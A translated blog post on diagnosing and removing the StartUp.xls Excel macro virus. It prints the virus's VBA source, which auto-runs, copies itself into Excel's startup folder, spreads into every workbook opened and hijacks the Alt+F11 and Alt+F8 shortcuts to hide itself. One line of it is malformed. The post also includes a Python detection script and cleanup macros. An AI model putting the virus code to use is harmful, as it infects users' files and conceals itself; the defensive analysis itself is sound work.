Encountering the StartUp.xls macro virus
http://sheng.javaeye.com/blog/741128 Category: General technology
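Today a friend asked me to look at a problem: whenever an Excel file was opened and then saved, Excel showed the prompt "This document contains macros, ActiveX controls, XML expansion pack information, or Web components. These may include personal information that cannot be removed by setting 'Remove personal information from file properties on save' on the Security tab of the Options dialog under the Tools menu." At first I assumed it was just a settings problem, but after several hours of digging I found that the file had been infected by a macro virus named StartUp.xls. Tracking the virus down was also a fairly roundabout process (mainly because my own skills are lacking).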
The virus sample is as follows:
VBA code:
' Runs automatically when the workbook is opened.
Sub auto_open()
    On Error Resume Next
    ' If this copy is not running from Excel's startup folder and StartUp.xls is not
    ' there yet, copy the "StartUp" sheet to a new workbook and save it there, hidden.
    If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
        Application.ScreenUpdating = False
        ThisWorkbook.Sheets("StartUp").Copy
        ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
        n$ = ActiveWorkbook.Name
        ActiveWindow.Visible = False
        Workbooks("StartUp.xls").Save
        Workbooks(n$).Close (False)
    End If
    ' Run cop() on every sheet activation, and redirect Alt+F11 (VBA editor)
    ' and Alt+F8 (macro dialog) to escape().
    Application.OnSheetActivate = "StartUp.xls!cop"
    Application.OnKey "%{F11}", "StartUp.xls!escape"
    Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
' Infects the active workbook: inserts the "StartUp" sheet as its first sheet,
' then reselects the sheet the user was on.
Sub cop()
    On Error Resume Next
    If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
        Application.ScreenUpdating = False
        n$ = ActiveSheet.Name
        Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
        Sheets(n$).Select
    End If
End Sub
' Re-arms the hooks and reopens StartUp.xls after escape() has run.
Sub back()
    On Error Resume Next
    Application.OnKey "%{F8}", "StartUp.xls!escape"
    Application.OnKey "%{F11}", "StartUp.xls!escape"
    Application.OnSheetActivate = "StartUp.xls!cop"
    Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
    Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub
' Self-concealment when the user presses Alt+F11 or Alt+F8: releases the key hooks,
' passes the keystrokes through, deletes the "StartUp" sheet from open workbooks and
' closes StartUp.xls; back() is scheduled for the next sheet activation.
Sub escape()
    On Error Resume Next
    Application.OnSheetActivate = "StartUp.xls!back"
    Application.OnKey "%{F11}"
    Application.OnKey "%{F8}"
    Application.SendKeys "%{F11}"
    Application.SendKeys "%{F8}"
    For Each book In Workbooks
        Application.DisplayAlerts = False
        If book "StartUp.xls" Then book.Sheets("StartUp").Delete
    Next
    For Each book In Workbooks
        If book.Name = "StartUp.xls" Then
            book.Close
        End If
    Next
End Sub
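As an added example (not part of the original post), the following Python sketch flags the behaviours visible in the sample above when run over macro source text that has already been extracted from a workbook. The rule ids, function names and the verdict logic are assumptions of this example, and both inputs are constructed from lines quoted on this page.

```python
import re

# Behaviours seen in the StartUp.xls sample above. Rule ids are this example's own.
RULES = {
    "autorun":       r"^\s*Sub\s+auto_open\s*\(",
    "startup_write": r"SaveAs\s*\(?\s*Application\.StartupPath",
    "sheet_hook":    r'Application\.OnSheetActivate\s*=\s*"[^"]+![^"]+"',
    "key_hijack":    r'Application\.OnKey\s+"%\{F(?:11|8)\}"\s*,\s*"[^"]+"',
    "sheet_copy":    r'\.Sheets\("[^"]+"\)\.Copy\s+before\s*:=',
}

def scan_vba(source):
    """Return {rule id: [1-based line numbers]} for each rule that matches."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("'"):      # skip whole-line VBA comments
            continue
        for rule, pattern in RULES.items():
            if re.search(pattern, line, re.IGNORECASE):
                hits.setdefault(rule, []).append(lineno)
    return hits

def verdict(source):
    """'suspicious' only when a startup-folder write co-occurs with a trigger."""
    hits = scan_vba(source)
    triggered = "autorun" in hits or "sheet_hook" in hits
    return "suspicious" if "startup_write" in hits and triggered else "no match"

# Constructed input 1: lines quoted from the sample on this page.
INFECTED = r'''Sub auto_open()
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
End Sub
Sub cop()
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
End Sub'''

# Constructed input 2: the hook lines of the page's cleanup macro, which reuses
# auto_open and OnSheetActivate but never writes to the startup folder.
CLEANER = r'''Sub auto_open()
Application.OnSheetActivate = "StartUp.xls!cop"
End Sub'''

if __name__ == "__main__":
    for name, src in (("INFECTED", INFECTED), ("CLEANER", CLEANER)):
        print(name, verdict(src), scan_vba(src))
```

The cleanup macro shares two hooks with the virus, which is why the verdict requires the startup-folder write as well and does not fire on auto_open or OnSheetActivate alone.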
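Following some references found online, I used the method below, which removes the virus and also cleans infected files once they are modified and saved (some people online say that cleaning directly with 360 or Kaspersky leaves the files unable to open; I have not tested this, so I don't know whether it is true):
1. Delete C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\Excel11.xls; Excel rebuilds this file automatically after it is deleted.
2. Delete C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\XLSTART\StartUp.xls
3. Create a new, empty StartUp.xls, then record a macro (record anything; this is only so that the VBA editor can be opened).
4. From "Tools -> Macro -> Macros", select the macro just recorded, choose "Edit", select all of its contents, and replace them with the following: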
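VBA code:
Sub auto_open()
    On Error Resume Next
    Application.ScreenUpdating = False
    ActiveWindow.Visible = False
    n$ = ActiveWorkbook.Name
    Workbooks(n$).Close (False)
    ' Run cop() whenever a sheet is activated
    Application.OnSheetActivate = "StartUp.xls!cop"
End Sub
Sub cop()
    ' Remove the "StartUp" component from every open workbook.
    ' Accessing VBAProject requires Excel's "Trust access to Visual Basic Project"
    ' setting; without it the calls fail and On Error Resume Next hides the failure.
    On Error Resume Next
    Dim book As Object
    Dim delComponent As Object
    Dim Name As String
    Name = "StartUp"
    For Each book In Workbooks
        ' Reset first so a workbook without the component is skipped
        Set delComponent = Nothing
        Set delComponent = book.VBAProject.VBComponents(Name)
        If Not delComponent Is Nothing Then
            book.VBAProject.VBComponents.Remove delComponent
        End If
    Next
End Sub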
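Statement: the material in this article comes from the Internet. I tested it on 11.28 and it still removes the virus, but different situations give different results! I wrote Word and PDF documents covering the whole process from testing to removal; download addresses: http://wenku.baidu.com/view/04f1ecd9ad51f01dc281f19d.html and http://wenku.baidu.com/view/9b339869a98271fe910ef93e.html
StartUp.xls macro virus removal method
Step 1: Remove StartUp.xls from C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART;
Step 2: Remove Excel11.xls from C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\; Excel will recreate this file by itself.
Step 3: Create the file C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART\startup.xls and enter the following code (the code is below the pictures). From then on, opening an infected Excel file will automatically remove the virus macro code that the file carries.
(Note: step 3 is fairly complicated and the description above is too brief; please look at my pictures instead, I won't write it out here! Picture address: http://hi.baidu.com/xiaolincc26/album/%E5%AE%8F%E7%97%85%E6%AF%92%E5%A4%84%E7%90%86 It is in my album. This is only my personal testing; in a different situation I don't know whether it will work, but it is worth a try. I believe there is currently no article online that explains this very clearly; those pictures are named very clearly.)
Some of these are hidden files that you cannot see. Do the following to make them visible: open My Computer >> Tools >> Folder Options >> clear the check mark in front of "Hide protected operating system files (Recommended)" >> select "Show hidden files, folders, and drives" >> clear the check mark for "Hide extensions for known file types" >> OK, and that's it!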
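(Code for guarding against the macro virus; tested working on 2010.11.18)
Sub auto_open()
    On Error Resume Next
    Application.ScreenUpdating = False
    ActiveWindow.Visible = False
    n$ = ActiveWorkbook.Name
    Workbooks(n$).Close (False)
    ' Run cop() whenever a sheet is activated
    Application.OnSheetActivate = "StartUp.xls!cop"
End Sub
Sub cop()
    ' Remove the "StartUp" component from every open workbook.
    ' Accessing VBAProject requires Excel's "Trust access to Visual Basic Project"
    ' setting; without it the calls fail and On Error Resume Next hides the failure.
    On Error Resume Next
    Dim book As Object
    Dim delComponent As Object
    Dim Name As String
    Name = "StartUp"
    For Each book In Workbooks
        ' Reset first so a workbook without the component is skipped
        Set delComponent = Nothing
        Set delComponent = book.VBAProject.VBComponents(Name)
        If Not delComponent Is Nothing Then
            book.VBAProject.VBComponents.Remove delComponent
        End If
    Next
End Sub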